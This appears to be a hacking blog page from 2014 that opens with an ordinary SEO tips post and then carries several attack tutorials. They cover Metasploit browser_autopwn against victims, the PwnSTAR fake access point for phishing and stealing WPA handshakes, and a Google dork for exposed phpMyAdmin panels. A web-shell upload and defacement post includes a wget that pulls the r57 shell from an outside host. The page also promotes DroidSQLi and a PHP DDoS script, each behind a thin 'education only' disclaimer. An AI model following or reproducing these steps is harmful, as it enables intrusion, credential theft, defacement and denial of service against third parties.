Senin, 14 April 2014

Top 10 latest SEO techniques for Webmasters



The success or failure of any site greatly depends upon the ranking of search engine that shows the results of your website. If your rank is very below like at 3 or 4 page, the visitors don’t have enough time to wait and watch every site on the web. They simply click among the sites that are posted on first page. Now, in order to increase your visitors your site must be among top sites for which you have to follow some SEO tips which are mentioned below. However getting a website on the top of the ranking takes a little time, but it's not something out of the box. Quality content is the key to reach at the top of the rankings using the latest search engine optimization techniques.


1). Create a Meta tag data for your Site..
A page title is the very first thing which a search engine looks at because it describes the mission statement of your website that what your website is about. It is also the first thing potential visitors will see when looking at your search engine listing.

It’s important to include one or two attractive and attention seeking keywords in the title tag — but don’t go overboard. You can also include your websites name and location in your title page.

2). Unique titles increase the probability of visitors ..  
Since titles are like the headings which are the first and most visible thing a visitor might see on your website. Therefore, before reading the inner crispy and crunchy content if the reader fails to appreciate your title then rich content is of no use. Therefore choose unique and engaging titles in order to maintain the attention of readers till the last word of your site. 

3). Make attractive keywords..
Before creating your keyword list, you’ll want to think of the specific terms people will type in when searching for a site like yours. Always include simple and relevant keywords related to the topic of your website. For example if your website is about textile do include the word threads and clothes but be stick to a brief list of keywords don’t include too many synonyms because it may increase the readers but they'll be short run reader you won't be able to catch them for a longer time.

4). Heading tags catches attention of readers easily..
Since, headings are the first thing which gains attention of the reader. Therefore make attractive, engaging and easy to relate headings. This is a very important element to consider when writing out your site copy. Use of heading tags helps users, web browsers and search engines alike know where the major key points of your copy are.

5). Use of ALT and TITLE tags to the images are a plus point...
The use of alt on images is useful from two points of views; first In SEO, putting a brief yet attention gaining alt attribute along with your image gives additional relevant text to your source code that the search engines can see when ranking your site. Secondly, the more relevant text on your page the better chance you have of achieving higher search engine rankings.

6). Promote your site through social media...
Since, Facebook and twitter have made virtual communities over internet and people spend most of the time surfing on these sites. Creating a page on Facebook is one of the leading trends emerging to market your brand. Also by giving the link of your site on Facebook can actually increase your viewers by a high percentage. And Facebook, Twitter, Google+, Pinterest & LinkedIn are those places from where you can get tons of free traffic. And they are crawled by search engines as well like Google.

7). Write clean content...
Always write clean, clear and legal content. Don’t use abusive language and don’t plagiarize the content. If you are copying content from any website, Always acknowledge it. This will for sure places your website among top priorities.

8). Give Brief description of each heading...
Before creating your own web site, remember it always write simply, explaining whatever information you’re discussing is relevant to your main topic and Meta title. The key is to make it sense to the reader. Even if you trick the search engines by increasing your rating and making your site listed on the first page. Remember you can't trick the reader who after clicking your site and taking no inputs from it rather than irrelevant content can switch to other site in a matter of seconds. 

9). Create Natural link profile...
With the use of natural and genuine content, you’ll be able to generate links with other web sites and blogs, as well. It’s kind of give and take scenario, that if you link out to other sites, you’ll find sites linking back to you  and this is how your page rank can go up as well.

10). Localize your content...

Always give proper name, address and relevant map of your website so that the reader can trace if you are making a brand or product related website

We hope you'll find the above tips useful when optimizing your websites/blogs. And also give us some feedback about your Search Engine Strategies in comment section.
Read more

Hack Remote Windows 7 | XP PC With Metasploit (Browser Auto Pwn Vulnerability)

Hi all this is one of the popular attack know as browser auto pwn Vulnerability which we are going to use in this tutorial.

This is a simple vulnerability that allow attacker to hack to remote machine just by a single click by the victim.
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

-::Using Metasploit::-

In Metasploit there is a module known as browser autopwn. The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits. When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.

Follow these steps to carry out the attack :-

1). Open you backtrack/kali terminal make sure metasploit is there (which is present by default :D ).

2). Type #msfconsole on terminal



3). Now follow these steps as show in image

4). Use the browser_autopwn module

use browser auto pwn


5).We have set up the LHOST with our IP address,the port to be 4445 and the URIPATH with / in order to prevent metasploit to set up random URL’s.now you will see below image.

server started with 16 module
Server started with 16 module.

6). Next we need to send the link to victim (like here http://192.168.205.131:8080/).as soon as the victim open the link its all done.

We have the meterpreter shell control in out hand you can do various activity you wish with meterpreter shell functionality.


Enjoy the hack of your victim machine have fun .!!!!

Read more

PwnSTAR: Pwn Soft Ap Script For Hacking

It is basically a bash script to launch a Fake AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing and phishing.Can act as multi-client captive portal using php and iptables.

Launches classic exploits such as evil-PDF.An easy way to launch the "best" metasploit modules eg CVE-2013-0422 De-auth with aireplay, airdrop-ng or MDK3.

Few Top features:-
1). Takes care of configuration of interfaces, macspoofing, airbase-ng and isc-dhcp-server
2). Steals WPA handshakes
3). Phishes email credentials
4). Serves webpages: supplied (eg hotspot, below) or provide your own
5). Sniffing with ferret and sslstrip
6). Adds a captive portal to the frontend of the fake AP
7). Assorted exploits
8). De-auth with MDK3, aireplay-ng or airdrop-ng
9). Use your imagination, craft your own webpages, and have fun.

Download Package contents:
-"Hotspot_3" is a simple phishing web page, used with basic menu option 4.
-"Portal_simple" is a captive portal which allows you to edit the index.html with the name of the portal
                    Example:- "Joe's CyberCafe". It is used for Sniffing.
-"Portal_hotspot3" phishes credentials, and then allows clients through the portal to the internet.
-"Portal_pdf" forces the client to download a malicious pdf in order to pass through the portal.
-Designed for Kali-linux and BackTrack5 ,Current version for Kali is PwnSTAR_0.9.

PwnSTAR.tgz is a bundle containing the current version of the script + all required webpages.

Download:-
Installation process:-

1). It is simple to install and use. download from above link and then follow the screenshot.


2). And Main menu is this-->


Keep checking Hackers-Store for upcoming tutorial on PwnSTAR.
Read more

Minggu, 13 April 2014

Upload Shell And Deface Via PhpmyAdmin

Earlier I have posted About How to get Acess to PhpmyAdmin without login through google dorks. As i promised I will post about how to deface using PhpmyAdmin. So here it is Lets start...
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements(All You Need):-
-You must have the full path 
- pma & mysql db privileges. 

Follow the Instructions:-
1). First login in to mysql. Or you can use these dorks also CLICK HERE.



2). Now click 'Show MySQL system varible" then 'SQL' . Now you can run sql commands,like create db, delete tables or whatever. We want to upload shell so lets move on to it. 



3). Now we will create a cmd line into a new file,with select into. SELECT "" INTO OUTFILE "full/path/here/cmd.php" and click 'Go'. 

4). Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell. wget http://www.r57.biz /r57.txt;mv r57.txt shell.php. Thats all then we av the shell on the site!!..!


Read more

Sabtu, 12 April 2014

PhpmyAdmin Exploit with Google Dorks




Hello Reader! Today Im going to show you how to exploit PHPmyAdmin with google Dorks. You dont nedd to do any thing no login nothing just put the dork and open any site you will directly go to PHPmyAdmin :).. So let's Start...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Follow the Instructions:-
1). Enter the following Dork in Google.
Dork: allinurl:index.php?db=information_schema
2). It will show you about 80,800 Results. So now you can guess how many Vuln  sites are there :D..Open any site you will redirect to PHPmyAdmin...:D

This dork bypasses the admin username and pass and takes You directly to information schema tables to get data and You can delete data

Learn To Deface VIA PhpmyAdmin:-
How to deface using PHPmyAdmin..

Hope you all are enjoying my blog posts...If you like our tutorials please leave valuable comments ...
Read more

Android Devices Are Vulnerable To Heartbleed Bug


Many Android Devices Are Vulnerable To Heartbleed Bug. Google recently reported that Android OS are vulnerable to Heartbleed Bug.

According to Google online security blog,
"We’ve assessed this vulnerability and applied patches to key Google services such as Search, Gmail, YouTube, Wallet, Play, Apps, and App Engine.  Google Chrome and Chrome OS are not affected. We are still working to patch some other Google services. We regularly and proactively look for vulnerabilities like this -- and encourage others to report them -- so that that we can fix software flaws before they are exploited.

If you are a Google Cloud Platform or Google Search Appliance customer, or don’t use the latest version of Android, here is what you need to know.

Cloud SQL
We are currently patching Cloud SQL, with the patch rolling out to all instances today and tomorrow. In the meantime, users should use the IP whitelisting function to ensure that only known hosts can access their instances.

Android
All versions of Android are immune to CVE-2014-0160 (with the limited exception of Android 4.1.1; patching information for Android 4.1.1 is being distributed to Android partners.
"

What is Heartbleed Bug?
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software.

The Heartbleed vulnerability exposed this week. Bug effected OpenSSL versions released in past two years. In vulnerable system, hackers can collect all encrypted data from a website's server before its deleted can say Zero day vulnerability.

According to report WSJ, Donations have picked up since Monday. This week, it had raised $841.70 as of Wednesday afternoon.

Check your server for Heartbleed Bug causing.
http://filippo.io/Heartbleed/
Enter a URL or a hostname to test the server for CVE-2014-0160

What is the CVE-2014-0160?
CVE-2014-0160 is the official reference to this bug. CVE (Common Vulnerabilities and Exposures) is the Standard for Information Security Vulnerability. 


Security Notice:
Some are websites also affected by Heartbleed Bug. You should change the passwords of your Email and Social Network accounts now. Mashable noticed Heartbleed hit list website affected.

Read more

Hack Website using Android Phone - Droidsqli



Hello Guys, today we talk about how to hacked a website using your Android phone.We know that in the world 70% website hacked by using SQL injection. For automate SQL injection We need tool or OS - back track, havij or Kali, and etc..But now you can attack on site using your android mobile phone and Tables and hack website using a Android App called Droidsqli.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Only you need 3 things:-
1). SQL Vulnerable site:- Learn to find Vuln sites
2). android mobile
3). Droidsqli tool:- Download Here

What is DroidSQLi?
DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.


Download(MediaFire):-
Password:- hackers-store.blogspot.com


How to use it?
Itz pretty simple actually coz all the process are done automated here.
All you need to do is find a vulnerable url and put it on Target URL and touch Inject
You will be getting data base and all server info .

DroidSQLi supports the following injection techniques:

  • Time based injection
  • Blind injection
  • Error based injection
  • Normal injection
It automatically selects the best technique to use and employs some simple filter evasion methods..! :)


Know more about SqlInjection ..
I am sure you will enjoy using this tool have fun and thanks again.
Read more

PHP Dos/DDoS Script (Dos Attack Tool)


Hello Readers, Today Im going to share a amazing PHP tool with you. This is one of the advanced tool of website crashing known as PHP Dos Attack Script. Simply download the file, unzip and upload the files to your web host.

FUNCTIONS:-







ddos script,php dos,php ddos script,php dos script,ddos php script,ddos php script,mysql ddos
ddos script php,phpDos,ddos scripts,script DDOS,php ddos,ddos php,denial of service script
dos php,ddos attack script,php ddoser,script php ddos,dos php script,php script ddos
php DDos attack script,script ddos php,PHP DoS Script by Exe,ddos,php dos by exe,ddos script

DENIAL OF SERVICE :-

php script,php ddos attack,php ddos download,download script ddos,ddos online
denial of service scripts,PHP DoS/DDoS (Denial Of Service) Script,ddos php tool
php curl ddos,ddos php scripts,script ddos attack,dos script denial,
php Dos scripts,php denial of service

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Full PHP-DOS-ATTACKER script including:

1). index.php
2). functions.php
3). main.jpg

Information provided on this blog is for purposes only!The author should not be held responsible! Use content and tools on this blog/site is your own RISK!!  

Download(MediaFire):-






Password: hackers-store.blogspot.com
Read more